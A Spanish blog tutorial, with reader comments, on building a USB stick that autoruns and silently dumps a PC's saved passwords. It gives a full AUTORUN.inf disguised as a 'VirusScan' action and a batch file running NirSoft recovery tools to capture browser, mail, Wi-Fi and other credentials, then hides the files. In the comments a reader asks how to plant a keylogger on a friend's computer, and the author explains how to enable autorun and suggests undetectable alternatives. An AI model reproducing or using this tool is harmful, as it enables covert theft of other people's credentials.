ladrondeusb

Hace unas semana publiqué una entrada sobre Stealers y expliqué lo que eran y para que servían, hoy vengo a explicaros como crear un USB que se autoejecute y recupere todas nuestras contraseñas del PC de manera automática, únicamente con conectarlo a nuestro PC, sin tocar absolutamente nada, ademas tendrá una función Keylogger, que registrará en un archivo .txt todo lo que pulsemos en nuestro teclado mientras el USB esté conectado al PC.

Pasos a seguir

1) Inserta un pendrive para formatearlo, haz “Click derecho” sobre la unidad y en “Formatear”, podemos formatearlo en NTFS o FAT32 (este último es mas recomendado).usbpen1usbpen2

2) Abrimos el bloc de notas o similar y escribimos lo siguiente:

[autorun]
open = launch.bat
UseAutoPlay = 1
ACTION = Escaneando con VirusScan

Guardamos el archivo con el nombre AUTORUN.inf y lo dejamos dentro del USB.

3) Volvemos al bloc de notas para crear otro archivo, esta vez escribiremos:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt

Guardamos el archivo con el nombre LAUNCH.bat y lo dejamos dentro del USB.

4) Visitamos la web http://www.nirsoft.net/ y nos descargamos las siguiente herramientas:

mspass.exe
mailpv.exe
iepv.exe
pspv.exe
PasswordFox.exe
OperaPassView.exe
ChromePass.exe
Dialupass2.exe
Netpass.exe
WirelessKeyView.exe
BulletsPassView.exe
VNCPassView.exe
OpenedFilesView.exe
ProduKey.exe
USBDeview.exe

Debemos de descomprimirlas en la raiz del USB, os dejo un link con las direcciones de las Herramientas.

Nos quedaría de la siguiente manera.

usbnir1

5) Descomprimimos todas las herramientas y ocultamos todos los archivos, al final todo quedaría así:

usbnir2 usbnir3

6) Quitamos el USB del ordenador y lo volvemos a insertar para comprobar que funciona, si todo ha ido bien nos aparecerán los siguientes .txt, que no hace falta que los abra porque ya se sabe lo que contienen, todas las contraseñas del sistema, incluidas las del WI-FI.

usbnir4

Espero que os haya gustado, y ya sabéis, no conectéis ningún USB a vuestro ordenador si no es vuestro o dudáis de lo que puede contener.


Javier Olmedo

Consultor de Ciberseguridad e Investigador de Seguridad de Aplicaciones Web en mi tiempo libre, Técnico en Sistemas Informáticos y Técnico Superior en Desarrollo de Software, apasionado de la [In]Seguridad Informática.

66 commentarios

mario eduardo · jueves, 22 noviembre, 2018 a las 23:47

yo tambien lo hice y cuando quito la USB y vuelvo a insertar no me aparece nada

mexsur@outlook.com · lunes, 12 noviembre, 2018 a las 19:41

esto se puede implementar para utilizarlo en andoid ?
con que tipo de herramientas?

    Javier Olmedo · martes, 13 noviembre, 2018 a las 15:16

    Existirán otras técnicas, pero esta desde luego no.
    Saludos!

Roberto · sábado, 15 septiembre, 2018 a las 03:14

Hola amigo intente los pasos pero no funcionó podrías actualizarlo ya q al usar el usb no salió ningún archivo y la otra es funciona con el pc bloqueado con cuenta de usuario y si el antivirus lo puede detectar y bloquear …se espera pronta respuesta

    Javier Olmedo · sábado, 22 septiembre, 2018 a las 10:17

    Hola Roberto,
    El post es de hace tiempo, es posible que algunas cosas hayan cambiado, de todas maneras, veré si saco tiempo y hago un post sobre USB Rubber Ducky, esto es indetectable por los antivirus y se ajusta más a lo que necesitas.
    Saludos,
    Gracias!

fraco96 · jueves, 16 agosto, 2018 a las 21:09

el link del dialupass no me funciona (cuando lo intento descargar)

    Javier Olmedo · viernes, 24 agosto, 2018 a las 11:59

    Los links son de hace tiempo, prueba a buscarlo en Nirsoft

repp · miércoles, 25 julio, 2018 a las 23:57

se podria usar un otg y hacerlo en android ? O sea en un movil ?

    Javier Olmedo · domingo, 29 julio, 2018 a las 23:46

    Sí, se podría hacer, pero no con las herramientas que he usado.
    Saludos!

yuver · viernes, 20 abril, 2018 a las 04:34

no encuentro los archivos para poder descargarlos

jose castro · lunes, 14 agosto, 2017 a las 06:55

amigo ya lo puliste? una duda al crear el archivo launch.bat y lo quiero ejecutar se abre con el bloc de notas me fui a aplicaciones predeterminadas pero no me da otra opcion que puedo hacer solo es en mi maquina win 8.1
y si ejecuto las apps me da un archivo .cfg

clay · viernes, 19 mayo, 2017 a las 17:12

oigan como instalo un usb keylogger en la pc de un amigo sin que se de cuenta que lo tiene>>>_

Favio Martinez · jueves, 23 marzo, 2017 a las 04:44

hola amigo, me salio todo perfecto pero lo unica la duda es que no me aparece los documentos de textos o ya despues de conectarlo el usb ¿ que debe de suceder? espero y me respondas y muchas gracias amigo por el tutorial.

    Javier Olmedo · jueves, 23 marzo, 2017 a las 19:32

    Hola Favio,

    Comprueba la ruta y letra de tu USB, puede estar fallando.
    No hay que realizar ningún paso más, los archivos pasan a tu USB.

    Saludos.
    Gracias.

      anonimo · viernes, 29 septiembre, 2017 a las 05:02

      hola javier tengo una duda cuando conectas el usb extrae informacion desde que lo conectas o tambien extrae la informacion que fue puesta antes de que lo conecte el usb

        Javier Olmedo · domingo, 1 octubre, 2017 a las 20:42

        Buenas,

        Extrae la información que haya en el equipo, es decir, desde antes.
        No tienes que dejar el USB conectado para recolectar información.

        Saludos,
        Gracias

David · domingo, 12 marzo, 2017 a las 02:30

Deberias Actualizar los links a los .exe

jimy · miércoles, 22 febrero, 2017 a las 13:09

buenas Javier creo que haces un buen trabajo al brindarnos tu experiencia y conocimiento en forma gratuita…mas lamento decir que no me ha funcionado en mi en windows 10. espero me des alguna solución.
un abrazo!!

    Javier Olmedo · miércoles, 22 marzo, 2017 a las 19:27

    Buenas Jimy,

    Gracias por tu valoración, ¿Puedes indicarme que falla para saber si puedo ayudarte?

    Saludos.
    Gracias.

Matias · lunes, 13 febrero, 2017 a las 22:03

Hola javier, muchas gracias por el aporte! primero que nada no le des bola a los comentarios negativos segui para adelante.

Con respecto al .inf no me estaría funcionando conecto el pen pero el .bat no se ejecuta si lo hago manualmente si

Sabes que puede ser?

Saludos!

    Javier Olmedo · miércoles, 22 marzo, 2017 a las 19:26

    Buenas Matias,

    Te agradezco que valores mi trabajo.
    Dependiendo en el sistema operativo / máquina que lo hagas lo hará automáticamente o no.
    Puedes crear accesos directos en el pen con .bat ocultos para que se ejecute.

    Saludos.
    Gracias.

holacomoandas · martes, 27 diciembre, 2016 a las 04:49

funciona el keylogger?

unknown · sábado, 24 diciembre, 2016 a las 16:18

¿NirSoft es seguro? me refiero a que si de alguna manera ellos también podrían obtener los datos de las víctimas…

Fer · martes, 15 noviembre, 2016 a las 03:09

Buenas.

He seguido el tutorial al pie de la letra y funciona todo salvo el generar automáticamente los archivos de texto con las contraseñas. Es decir, puedo ejecutar manualmente el .exe de algún programa, como el ChromePass y ver o guardar por mi mismo el archivo de texto pero no lo genera solo el .bat.

Lo he probado en dos equipos distintos y no ha dado resultado, en uno veía los archivos ocultos y en el otro directamente no hacía nada.
Cabe decir que ambos ordenadores tienen W10.

¿Tiene algo que ver el sistema operativo? ¿He hecho algo mal?

Un saludo y gracias por tu tiempo.

    Fer · martes, 15 noviembre, 2016 a las 03:12

    Añadir que he ejecutado el .bat por mi mismo y solo ha abierto los programas y ha creado algunos .txt, pocos, pero todos vacíos salvo uno.

    David · domingo, 12 marzo, 2017 a las 02:31

    Si funciona?

Osmar · domingo, 30 octubre, 2016 a las 16:26

Hola Amigo, podrias decir como Habilitar la autorun en la usb?? pls

FireBlood · martes, 20 septiembre, 2016 a las 21:57

Hola, lo he probado pero no me ha funcionado, a los demás les funciona?

    Javier Olmedo · miércoles, 26 octubre, 2016 a las 23:35

    Buenas, ¿Qué problema tienes?
    Saludos!!!

      Alberto · viernes, 28 octubre, 2016 a las 20:50

      JAvier, Alguna te trae la de windows, es decir la de inicio de sesión???

        Javier Olmedo · domingo, 30 octubre, 2016 a las 20:42

        Buenas Alberto,

        No, ninguna saca la de Windows.
        En todo caso, puede que alguna herramienta de Nirsoft saque el hash, pero no la he utilizado en este tuto.

        Saludos.

daniel · domingo, 4 septiembre, 2016 a las 21:13

hola como estas Javier muy bueno el tutorial, lo unico que como una persona pregunto no todos los ejecutables crean el txt como por ejemplo el ChromePass.exe y creo que es el mas importante a la hora de extraer contraseñas, solo crea un archivo cfg sin informacion importante… sabes como habria que hacer para solucionarlo? y ademas seria ideal agregar algun comando para que vuelva a cerrar todas las ventanas que abre el ejecutable para que sea del todo automatica..Gracias!

    alfredo rolon · jueves, 8 septiembre, 2016 a las 00:37

    Estimado saludos, gracias por compartir tus conocimientos…la verdad muy agradecido… para descomprirmir los archivos en el pendrive se hace 1 por 1… o se seleccionan todos y se extraen todos ..porq me sale cada vz que se debe reemplazar un archivo que hago se le da si, a todo o se le da no, a todo con respecto al archivo http://www.nirsoft.net/utils/dialupass2.html ya no existe hay una version 3 habra algun problema con eso esperando ..una pronta respuesta estimado y gracias nuevamente

MrDeiii · martes, 23 agosto, 2016 a las 13:53

Me extraña que supuestamente seas un informático, programador, apasionado de la seguridad… y publiques esta mierda en el año 2015, cuando eso ya hace años que no funciona, debido a que los S.O. actuales, el autorun lo tiene deshabilitado por defecto. O intentas vender humo o de informático tienes poco.

    Javier Olmedo · lunes, 29 agosto, 2016 a las 19:01

    Hola MrDeiii,

    Agradecería que tus comentarios no faltaran el respeto, puede parecerte una “mierda”, pero como te he comentado en el comentario anterior, funciona perfectamente incluso en Windows 10, otra cosa es que seas “habilidoso” para activar el autorun.
    En cuanto a lo de informático y programador, no sé si lo seré, desde luego he estudiado unos cuantos añitos y aquí tengo los títulos.

    Saludos.

Piero · sábado, 25 junio, 2016 a las 01:25

Javier no me sale en blog de notas como aparece en la imagen.
me podria dar mas detalles este es mi correo pxdxnzy@hotmail.es

    MrDeiii · martes, 23 agosto, 2016 a las 13:46

    Eso que explica no funciona. Funcionaba hace unos 10 años o mas, pero actualmente no, ja que se ejecuta automáticamente con autorun y el autorun, en los sistemas operativos actuales esta deshabilitado. Creo que el ultimo Windows que lo tenia habilitado por defecto, era el XP.

      Javier Olmedo · lunes, 29 agosto, 2016 a las 18:55

      Buenas,

      Agradezco tu comentario.
      Si el autorun esta deshabilitado, hay maneras para habilitarlo.
      Lo he probado en Windows 10 y salvo una herramienta las demás funcionan perfectamente.

      Saludos.

        pepikex · martes, 20 noviembre, 2018 a las 23:33

        sabes como activar el autorun en windows 10?
        me prodrías echar una manita?

          Javier Olmedo · viernes, 23 noviembre, 2018 a las 08:51

          Claro amigo,
          Debes ir a Configuración de Windows > Dispositivos > Reproducción automática y allí configuras según tus preferencias.
          Espero te sirva de ayuda.
          Saludos!!

Christian · viernes, 10 junio, 2016 a las 02:41

Disculpa tío, pero no me crea los archivos de texto que se suponen que hacen…
Me puedes decir a que se debe eso?…

Duvan Morales · jueves, 26 mayo, 2016 a las 19:01

No funciona en windows 10

gUSTAVO · viernes, 4 marzo, 2016 a las 19:37

NO ME CREA LOS TXT

pablo · lunes, 7 diciembre, 2015 a las 16:15

no me crea los archivos de texto

Antonio Amador · lunes, 30 noviembre, 2015 a las 00:13

Esta caído el enlace del cuarto programa para descargar 🙁

Den · sábado, 14 noviembre, 2015 a las 06:33

Muy buen post lo unico es que no me funciona hice todo igualito que tu pero al volver a conectar el usb no aparecen los archivos txt me pueder decir porque o alomejor no es compatible con el windows 8.1

Victor · jueves, 29 octubre, 2015 a las 19:55

Hola, te he enviado varios mensajes por twitter.
Me gustaría saber si vas a arreglar el problema del Dialupass2.exe.
Gracias de antemano.

enzo · lunes, 26 octubre, 2015 a las 19:25

son necesarias todas las herramientas osea hay que descargarlas todas porque no puedo descargar esta Dialupass2.exe y probe si funcionaba sin ella y no aparece nada

Andres · viernes, 7 agosto, 2015 a las 07:32

Buenas, e echo todo el proceso, pero cuando quito la memoria y vuelvo y la meto no me aparece ninguna contraseña, me aparece sin nada le mamoria, el archivo Dialupass2.exe no se encuentra, se encuentra es la vercion 3, que fue la que descargue, hay algun problema de pronto en eso ?

carla · miércoles, 5 agosto, 2015 a las 13:59

muy bueno el post!!! me he quedado impresionada. Me gustaria saber si hay alguna opcion de copiar el contenido de todas las imagenes jpeg o videos del pc tb al usb en modo oculto
muchas gracias

Juan · jueves, 4 junio, 2015 a las 08:09

Mi pc no deja descargarme los archivos los detecta como maliciosos? . igual pasara si lo conécto a la PC

    Javier Olmedo · lunes, 8 junio, 2015 a las 00:16

    Hola Juan,

    Es posible que si tienes el antivirus activado los detecte como maliciosos.
    Algunas firmas tienes el dominio de Nirsoft como malicioso, cuando no es así.

    Saludos.

D · viernes, 29 mayo, 2015 a las 11:54

Las herramientas de Nir ya las conocía, pero este método está muy bien….siempre y cuando no tenga inhabilitado el autorun del usb…

Lo probaré, muy instructivo….le enseñaré a mi hijo que no se fie de un pendrive ajeno…

Saludos

    Javier Olmedo · viernes, 29 mayo, 2015 a las 14:44

    Hola amigo, me alegra que enseñes a tener precaución a tu hijo partiendo de un articulo mio. Es lo mas satisfactorio para mí.

    Saludos.

      Jeison · martes, 5 enero, 2016 a las 20:50

      buen aporte pero mira los archivo me aparecen como archivo CFG no como archivoz de texto no se xq si me puedes ayudar te lo agradeceria

chc · sábado, 2 mayo, 2015 a las 14:55

gracias esta muy chulo!

Deja tu comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.